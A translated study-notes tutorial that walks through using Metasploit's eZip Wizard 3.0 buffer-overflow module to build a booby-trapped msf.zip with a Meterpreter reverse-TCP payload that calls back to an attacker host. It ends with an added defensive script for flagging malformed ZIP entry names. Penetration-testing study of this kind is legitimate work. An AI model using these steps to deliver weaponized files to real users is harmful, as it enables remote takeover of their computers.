Web security study notes: web penetration testing
Official site: 宣紫科技
This one is easy to understand. Local targets are things like RAR, ZIP, media players and so on: once we generate a vulnerability file with MSF and someone opens it with the specific (vulnerable) program, they get hit by the trojan.
Open UB 1. Let's use ZIP as the example: start Metasploit and search for zip modules
msf > search zip
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/oracle/post_exploitation/win32upload 2005-02-10 normal Oracle URL Download
auxiliary/dos/wifi/netgear_ma521_rates normal NetGear MA521 Wireless Driver Long Rates Overflow
auxiliary/dos/wifi/netgear_wg311pci normal NetGear WG311v1 Wireless Driver Long SSID Overflow
exploit/multi/fileformat/peazip_command_injection 2009-06-05 excellent PeaZip <= 2.6.1 Zip Processing Command Injection
exploit/multi/http/splunk_mappy_exec 2011-12-12 excellent Splunk Search Remote Code Execution
exploit/multi/wyse/hagent_untrusted_hsdata 2009-07-10 excellent Wyse Rapport Hagent Fake Hserver Command Execution
exploit/osx/browser/safari_metadata_archive 2006-02-21 excellent Safari Archive Metadata Command Execution
exploit/solaris/dtspcd/heap_noir 2002-07-10 great Solaris dtspcd Heap Overflow
exploit/windows/browser/adobe_shockwave_rcsl_corruption 2010-10-21 normal Adobe Shockwave rcsL Memory Corruption
exploit/windows/browser/ms06_067_keyframe 2006-11-14 normal Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability
exploit/windows/browser/winzip_fileview 2007-11-02 normal WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow
exploit/windows/driver/dlink_wifi_rates 2006-11-13 low D-Link DWL-G132 Wireless Driver Beacon Rates Overflow
exploit/windows/fileformat/ezip_wizard_bof 2009-03-09 good eZip Wizard 3.0 Stack Buffer Overflow
exploit/windows/fileformat/real_networks_netzip_bof 2011-01-30 good Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability
exploit/windows/fileformat/scadaphone_zip 2011-09-12 good ScadaTEC ScadaPhone <= v5.3.11.1230 Stack Buffer Overflow
exploit/windows/fileformat/tugzip 2008-10-28 good TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability
exploit/windows/ftp/3cdaemon_ftp_user 2005-01-04 average 3Com 3CDaemon 2.0 FTP Username Overflow
exploit/windows/ftp/easyftp_cwd_fixret 2010-02-16 great EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow
exploit/windows/http/hp_nnm_ovas 2008-04-02 good HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow
exploit/windows/telnet/gamsoft_telsrv_username 2000-07-17 average GAMSoft TelSrv 1.5 Username Buffer Overflow
exploit/windows/tftp/attftp_long_filename 2006-11-27 average Allied Telesyn TFTP Server 1.9 Long Filename Overflow
msf >
Take ezip_wizard_bof as the example: exploit/windows/fileformat/ezip_wizard_bof
msf > info exploit/windows/fileformat/ezip_wizard_bof
Name: eZip Wizard 3.0 Stack Buffer Overflow
Module: exploit/windows/fileformat/ezip_wizard_bof
Version: 15014
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Good
Provided by:
fl0 fl0w
jduck <jduck@metasploit.com>
Lincoln
Available targets:
Id Name
-- ----
0 Windows Universal
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.zip yes The output file name.
USERNAME yes Username
Payload information:
Description:
This module exploits a stack-based buffer overflow vulnerability in
version 3.0 of ediSys Corp.'s eZip Wizard. In order for the command
to be executed, an attacker must convince someone to open a
specially crafted zip file with eZip Wizard, and access the
specially file via double-clicking it. By doing so, an attacker can
execute arbitrary code as the victim user.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-1028
http://www.osvdb.org/52815
http://www.securityfocus.com/bid/34044
http://www.edisys.com/
http://www.exploit-db.com/exploits/8180
http://www.exploit-db.com/exploits/12059
msf >
A local overflow in eZip Wizard 3.0. Let's generate the file:
msf exploit(ezip_wizard_bof) > show options
Module options (exploit/windows/fileformat/ezip_wizard_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.zip yes The output file name.
USERNAME yes Username
Exploit target:
Id Name
-- ----
0 Windows Universal
msf exploit(ezip_wizard_bof) > set USERNAME
set USERNAME
msf exploit(ezip_wizard_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ezip_wizard_bof) > set USERNAME test
USERNAME => test
msf exploit(ezip_wizard_bof) > set LHOST 5.5.5.5
LHOST => 5.5.5.5
msf exploit(ezip_wizard_bof) > exploit
[*] Creating 'msf.zip' file...
[+] msf.zip stored at /root/.msf4/local/msf.zip
msf exploit(ezip_wizard_bof) >
Take a look at the generated file:
root@root:~# file /root/.msf4/local/msf.zip
/root/.msf4/local/msf.zip: Zip archive data, at least v2.0 to extract
root@root:~#
When someone opens it with eZip Wizard 3.0, they get hit by our PAYLOAD backdoor.
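`file` only confirms the container type. As an added defensive triage example (not code from the original post or from Metasploit), the Python script below walks a ZIP's local file headers and flags entries whose names are oversized or contain non-printable bytes, the kind of malformed field an archive-parser overflow rides on. The 256-byte threshold and the assumption that this exploit family is triggered by an oversized entry name are mine; `build_zip` only constructs sample input.

```python
import io
import struct
import zipfile

# Triage threshold: entry names longer than this are flagged. The value is an
# assumption for this example; tune it to the parser you are protecting.
MAX_NAME = 256

LOCAL_HDR = b"PK\x03\x04"          # local file header signature
LOCAL_HDR_FMT = "<IHHHHHIIIHH"     # 30-byte fixed part of the local header


def scan_zip_entries(data: bytes, max_name: int = MAX_NAME):
    """Walk every local file header and return (offset, name_len, reason)
    for entries whose name is oversized, non-printable or truncated.

    Headers are parsed with struct rather than zipfile so that a deliberately
    malformed archive still yields findings instead of an exception.
    """
    findings = []
    pos = data.find(LOCAL_HDR)
    while pos >= 0:
        if pos + 30 > len(data):
            findings.append((pos, 0, "truncated local header"))
            break
        fields = struct.unpack(LOCAL_HDR_FMT, data[pos:pos + 30])
        csize, name_len, extra_len = fields[7], fields[9], fields[10]
        name = data[pos + 30:pos + 30 + name_len]
        if name_len > max_name:
            findings.append((pos, name_len, "oversized entry name"))
        elif any(b < 0x20 or b > 0x7E for b in name):
            findings.append((pos, name_len, "non-printable bytes in entry name"))
        # Skip name, extra field and stored data, then look for the next header.
        pos = data.find(LOCAL_HDR, pos + 30 + name_len + extra_len + csize)
    return findings


def build_zip(name: str) -> bytes:
    """Build a small constructed archive with one entry (sample input only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(name, b"hello")
    return buf.getvalue()


if __name__ == "__main__":
    for label, sample in (("benign", build_zip("report.txt")),
                          ("long name", build_zip("A" * 1024))):
        print(label, scan_zip_entries(sample))
```

Run it against the file reported by `file` above; an empty list means every entry name passed the checks, which is a pre-filter, not proof the archive is safe.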